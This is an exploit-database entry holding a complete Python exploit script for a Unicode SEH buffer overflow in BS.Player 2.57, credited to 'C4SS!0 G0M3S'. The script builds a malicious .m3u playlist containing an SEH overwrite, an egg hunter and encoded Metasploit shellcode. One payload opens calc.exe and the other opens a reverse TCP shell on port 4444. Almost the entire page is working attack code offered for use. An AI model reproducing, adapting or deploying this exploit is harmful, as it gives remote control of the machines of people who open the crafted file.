BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Buffer Overflow Exploit in Bsplayer 2.5

                                                #
#
#[+]Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH)
#[+]Date: 01\07\2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2
#[+]Version: 2.57
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#  #########      ##   #########      #########  ##     ###############
#  #########    ####   #########      #########  ##     ##           ##    
#  ##         ## ##    ##             ##         ##     ##           ## 
#  ##        ##  ##    ##             ##         ##     ##           ##
#  ##       ########## ########       ########   ##     ##           ##
#  ##            ##          ##             ##   ##     ##           ##
#  ##            ##          ##             ##   ##     ##           ##
#  ########      ##    ########      #########   ##     ##           ##
#  ########      ##    ########      #########   \/     ###############
#                                              
#Created By C4SS!0 G0M3S
#[email protected]
#www.invasao.com.br
#
#


import os
import sys
import time
import string

os.system(&#34;cls&#34;)
os.system(&#34;color 4f&#34;)

def usage():
        print &#34;\n&#34;
        print &#34;[+]Exploit: Exploit Buffer Overflow Bsplayer(UNICODE-SEH)&#34;
        print &#34;[+]Date: 01\\07\\2010&#34;
        print &#34;[+]Author: C4SS!0 G0M3S&#34;
        print &#34;[+]Home: www.invasao.com.br&#34;
        print &#34;[+]E-mail: [email protected]&#34;
        print &#34;[+]Version: 2.57&#34;
        print &#34;[+]Software: Bsplayer 2.57\n&#34;
        print &#34;[-]Note:&#34;
        print &#34;TO EXPLOIT THE RUN FILE NAME MUST BE FILE_NAME.M3U\n&#34;


if((len(sys.argv)!=3) or (int(sys.argv[1])&#60;1) or (int(sys.argv[1])&#62;2)):
        usage()
        print &#34;Payloads:\n1 - WinExec(\&#34;Calc.exe\&#34;,0)\n2 - Reverse_Tcp_Shell\n&#34;
        print &#34;[-]Usage: &#34;+sys.argv[0]+&#34; &#60;Playload Number&#62; &#60;File Name&#62;&#34;
        print &#34;[-]Exemple: &#34;+sys.argv[0]+&#34; 1 Exploit.m3u&#34;
        sys.exit(0)

usage()
buffer = &#34;\x42&#34; * 4102
nseh = &#34;\x61\x6d&#34;
seh = &#34;\xde\x4e&#34; #pop ebx - pop ebp - ret at 0x004E00DE [bsplayer.exe]
egg_hunter = &#34;\x45\x61\x45\x61\x45\x50\x45\xc3&#34;

junk = &#34;\x45&#34; * 1094
print &#34;[*]Identifying the length Shellcode&#34;
time.sleep(1)
if int(sys.argv[1]) == 2:
	shellcode = (&#34;PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ&#34;
	&#34;ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBNKWY7N4PV9X6PQX1PV9JYNZ9SDMTZTR&#34; # 
	&#34;83SY0KT01RPLLLCBPLLT2RLPJX9KKTOX3NZUKKV0VLK3Y3MLRONMMJU2VWC8VQKQSOPTZT3CTK1LPUR6&#34; #
	&#34;KZR65RJC7NPWDLVRZQUMFMV85BXR7BOG8SCKUNXUVMVGIPMKJJZ6XSQ40ORI2UTOWNWRXVF679XJWYPL&#34; #FROM METASPLOIT FRAMEWORK 
	&#34;OU2QOXQNN0GGLNM3HJLRVWUSKO4OWMVOZKXLKLY2B3U1BQMPEBVMQEEFULKP12N8GHWH43CROTS2NPPD&#34; #
	&#34;QT0YXLS5MOM3OCKSRWPFLJWWN19PSXXOFKYD7KLN3WYMFFEJY7LO785W6C1TM7MOURUH7EOM1FZTEMOJ&#34; #SHELLCODE REVERSE_TCP_SHELL ON PORT 4444
	&#34;28TUN2LK0SKNTKKPHJSDRKLFONNC2620QXQTRFZUE3UGR8TOL5V3YO47PRSMMBURNNL9MNEHNELX5NOW&#34; #
	&#34;Q8C5UPOLK3BIRSQBOXVDD9STOI8LHBM1Y3PEPOKMQOMKRN8JZIJ3MPJ0VRRYY92VP0DLVJ3TVJFWKSKB&#34; #PROMPT:
	&#34;QCMXW7O30CRZRF7JK7JV4S2SRM9M5RRTOZZVFYQQDKKW1LY7S6LZFJLLZNXMJB685QOJGLNKNITOCZSK&#34; #
	&#34;QITVVPONFL6LN0O1RVBINM6OLML4XL0TNL6RRVN28UOKSULQJXYLLY9NLM57LVDS8NY2PMQ3MORRMHQD&#34; #C:\&#62;Telnet 127.0.0.1 4444
	&#34;BEINV9QY8U0MN1ZTUPPO3KGMVDOQWLNEUOJLWKE6UPNMBX12QURRNVJN78DYMXKOMHNA&#34;)            # 
                                                                                       #
if int(sys.argv[1]) == 1:
        shellcode = (&#34;PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ&#34;
        &#34;ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBIKY0NQ99GO3LLVRPHLXY2TMTL46QMNR&#34;
        &#34;8P1SHN853YXKLKSSHQXL4TENPSHWL3599RX6VNCJUKCH4VNSMM25ZOJP2MLWORBZMMM1DJ5QVO9MQ9W4&#34;
        &#34;V30ZUBQWZLFP5KELTXGCLKKMKLE2KZPNG9MOXKMNBNXMKVBK893KGOKSJXOPLPOMS8SR3UTPWKGHXOKT&#34;
        &#34;CDN4CMOQG1C34R171NSXML5WVKE7QSN4XL5VJZQM5W8O669OMOK90J9KN0Q31VVLNNOCUN957X7SHNOP&#34;
        &#34;YTP3KXWLE3O9XCKXJA&#34;)

print &#34;[*]The Length Shellcode:&#34;+str(len(shellcode))

time.sleep(1)

shellcode += &#34;\x41&#34; * 5000

file = str(sys.argv[2])

payload = buffer+nseh+seh+egg_hunter+junk+shellcode

op = &#34;w&#34;
print &#34;[*]Creating Your File &#34;+file
time.sleep(1)
try:
        f = open(file,op)
        f.write(&#34;http://&#34;+payload)
        f.close()
        print &#34;[*]The File &#34;+file+&#34; was Successfully Created&#34;
except:
        print &#34;[*]Error Creating File &#34;+file
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1